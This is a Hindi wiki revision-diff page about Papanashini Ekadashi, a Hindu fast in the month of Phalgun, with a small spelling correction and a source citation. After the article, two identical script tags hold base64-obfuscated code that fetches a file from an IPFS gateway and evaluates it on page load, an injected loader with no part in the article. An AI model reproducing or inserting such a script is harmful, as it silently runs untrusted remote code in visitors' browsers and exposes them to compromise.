Difference between revisions of "पापनाशिनी एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*जब [[फाल्गुन]] में [[एकादशी]] [[पुष्य नक्षत्र]] एवं गुरुवार को हो और जब सूर्य कुम्भ या मीन राशि में हो या जब एकादशी पुष्य नक्षत्र से युक्त हो तो उस तिथि को पापनाशिनी कहा जाता है।<ref>गदाधरपद्धति (कालसार, [[वायु पुराण]] एवं [[वराह पुराण]] से उद्धरण)।</ref>
 
*जब [[फाल्गुन]] में [[एकादशी]] [[पुष्य नक्षत्र]] एवं गुरुवार को हो और जब सूर्य कुम्भ या मीन राशि में हो या जब एकादशी पुष्य नक्षत्र से युक्त हो तो उस तिथि को पापनाशिनी कहा जाता है।<ref>गदाधरपद्धति (कालसार, [[वायु पुराण]] एवं [[वराह पुराण]] से उद्धरण)।</ref>
 
 
 
 

Revision as of 18:03, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab phalgun mean ekadashi pushy nakshatr evan guruvar ko ho aur jab soory kumbh ya min rashi mean ho ya jab ekadashi pushy nakshatr se yukt ho to us tithi ko papanashini kaha jata hai.[1]

 

tika tippani aur sandarbh

  1. gadadharapaddhati (kalasar, vayu puran evan varah puran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>